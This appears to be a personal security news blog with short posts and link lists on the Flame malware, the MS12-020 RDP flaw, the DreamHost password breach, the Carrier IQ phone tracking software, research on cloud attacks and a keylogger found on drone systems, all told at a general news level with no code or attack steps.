There’s a “new” two-year-old botnet/spy malware that has gone completely undetected until now. How? It just came out of cryogenic sleep, apparently.
Labeled as Flame or Skywiper in some in instances, this newly-discovered piece of malware has been labeled as the “industrial vaccuum cleaner” of malwares. It was discovered by Kaspersky in an audit of the Iranian oil industry’s systems and appears to be mostly focused toward the Middle-East and Eastern Europe.
The scariest part is that it was not detected by ANY antivirus or anti-malware systems for the time it’s been around as well as the sheer volume of information it collects. The size of this newly discovered malware has been estimated at 20 times the size of Stuxnet. Kaspersky has labeled this as the “most complex malware ever.” It is known to collect massive amounts of network traffic, screen-shots, documents, conversations, and even logs keystrokes of infected systems, making it an extremely dangerous threat to any system or the network it is on.
It is believed that this is another state-sponsored piece of malware in the ever-escalating cyber war between countries. Any bets on who contracted its creation?
- Cyber-weapon Flame, “most complex malware ever,” identified by Kaspersky Lab (boingboing.net)
- Android Malware Genome Project will catalog, share Android malware (arstechnica.com)
- Flame Cyber ‘Super-Weapon’ Caught Firing On Iran – techweekeurope.co.uk (techweekeurope.co.uk)
- ‘Flame’ cyberespionage worm discovered on thousands of machines across Middle East (theverge.com)
- Stuxnet On Steroids (outsidethebeltway.com)
- ‘Flame,’ a cyberweapon that makes Stuxnet look cheap (wired.com)
- Massive targeted cyber-attack in Middle East uncovered (news.cnet.com)
- The Flame: Questions and Answers (securelist.com)
- Analyst Warns of New ‘Flame’ Cyber Weapon (mashable.com)
- Massive ‘Flame’ Malware Stealing Data Across Middle East (emmageraln.com)
An EXTREMELY critical flaw in Microsoft’s RDP protocol (Remote Desktop) has been discovered and disclosed by Microsoft today. This vulnerability is about as critical as they get; especially for corporate customers. In short, any attacker who sends specially crafted code to any computer running Microsoft Windows that hat has Remote Desktop enabled can essentially take control of it. Microsoft has already released an article about it here (MS12-020).
All users are advised to update their machines as soon as possible, as this nasty exploit has the potential to become very nasty, very fast.
- Microsoft to patch Windows bug called ‘Holy Grail’ by one researcher (networkworld.com)
- KB 2671387 (support.microsoft.com)
- March 2012 Microsoft Black Tuesday, (Tue, Mar 13th) (isc.sans.edu)
- Microsoft Issues Urgent Patch for ‘Wormable’ RDP Vulnerability (pcworld.com)
According to DreamHost’s Status and Blog, staff noticed some unusual activity on one of their databases that held user login information for shell accounts. While the passwords were mostly encrypted, hackers “hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted,” according to DreamHost CEO Simon Anderson.
As a precaution, ALL shell/FTP account passwords were reset by DreamHost. While it will cause some inconvenience for users trying to access their sites over SSH/FTP, the implications are much more serious. A lot of CMS systems store their database username and passwords in plaintext on configuration files. If whoever gained access to DreamHost’s shell account database and managed to decrypt the information, then they would have unmitigated access to not only sites’ files, but they could potentially (and most likely) gain access to the back-end database driving those sites with all user data. This could be a very major breach of user data from one of the largest web hosts in the United States.
DreamHost is being unusually mum about the technical details about the hack and is angering customers over their negligence regarding out-dated server software. While most front-end software is kept up-to-date, their back-end software is grossly outdated and there appears to be no real effort nor care by DreamHost to keep OS and back-end software updated. What makes things worse is that DreamHost’s official stance on their security solution is to not disclose what technologies they use. Rather than taking a proactive and relatively transparent stance to their own security systems, the company has decided to take-up a reactive and a “security through obscurity” stance.
- DreamHost Security Issue Prompts FTP Password Resets (sucuri.net)
- Changing Shell/FTP Passwords due to Security Issue (dreamhoststatus.com)
- Security Update (dreamhost.com)
I first took attention to Carrier IQ when it was discovered by custom ROM developers for the phone I personally have; the Sprint Epic4G made by Samsung. The device is part of the massively popular Galaxy S line of Android-powered devices that virtually every major cellular carrier in the world sells. Around June, it was discovered that this software records virtually everything a user does with their phone from each screen-tap to every site they visit to recording audio and even the physical orientation of the device itself.
A thread (which I now cannot find on XDA-Developers) outlined this “middleware” and it was surmised that individual Carriers like Sprint used it solely for coverage and troubleshooting issues. An effort was undertaken to remove this software from the Android Linux kernel as it was discovered to hinder the device’s performance. Developers notably had a very difficult time removing Carrier IQ, but managed to eventually remove it for their custom Android ROMs.
Fast forward to Fall of 2011 where a developer named Trevor Eckhart decided to look into Carrier IQ a bit deeper and found that Carrier IQ was essentially a rootkit and actually recorded almost all actions performed with a device it was installed on and phoned home with that information. He has released a video showing proof of Carrier IQ recording his location with location turned off, un-encrypted HTTPS streams, all SMS messages sent/received, and even EVERY touch of the device screen he makes.
Essentially what everything boils down to is that carriers can spy on literally everything you do with your phone. This is obviously a blatant violation of privacy rights and repercussions are sure to come. Developing…
- Carrier IQ Rootkit Reportedly Logs Everything On Millions Of Phones (pcworld.com)
- You Can Test Your Android For Carrier IQ (Sort Of) [Carrier Iq] (gizmodo.com)
- People Are Freaking Out About Carrier IQ, The Hidden Smartphone Program That Tracks Everything You Do (businessinsider.com)
- Carrier IQ: How To Find It, And How To Deal With It – TechCrunch (techcrunch.com)
- Silicon Alley Insider: RIM: We Do Not Authorize Carrier IQ On BlackBerry Phones (RIMM) (businessinsider.com)
- Verizon: No CarrierIQ, No way (gigaom.com)
- So, there’s a rootkit hidden in millions of cellphones (zdnet.com)
- Phone ‘Rootkit’ Maker Carrier IQ May Have Violated Wiretap Law In Millions Of Cases (textually.org)
NetworkWorld has a very interesting writeup about a report that six German Information Security researchers published outlining very massive and highly exploitable flaws in Cloud Computing services; specifically Amazon’s EC2 and S3 as well as Eucalyptus Cloud Computing Software. Old concepts like XSS and what is referred to as XML Signature Wrapping attacks on the SOAP interfaces of the aforementioned cloud services. Very troubling and a large blow to the legitimacy of security in the cloud.
- Researchers Demo Cloud Security Issue With Amazon AWS Attack (pcworld.com)
- Researchers demo cloud security issue with Amazon AWS hijacking attack (infoworld.com)
- Cloud computing: Gaps in the ‘cloud’ (physorg.com)
- Researchers demo cloud security issue with Amazon AWS attack (networkworld.com)
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other war zones. The name of the virus is yet to be known, as details are still emerging about how the malicious code got into the systems in the first place. Could this be a belligerent enemy to US forces attacking their main weapon in use for remote regions? Ars Technica has the story after the jump.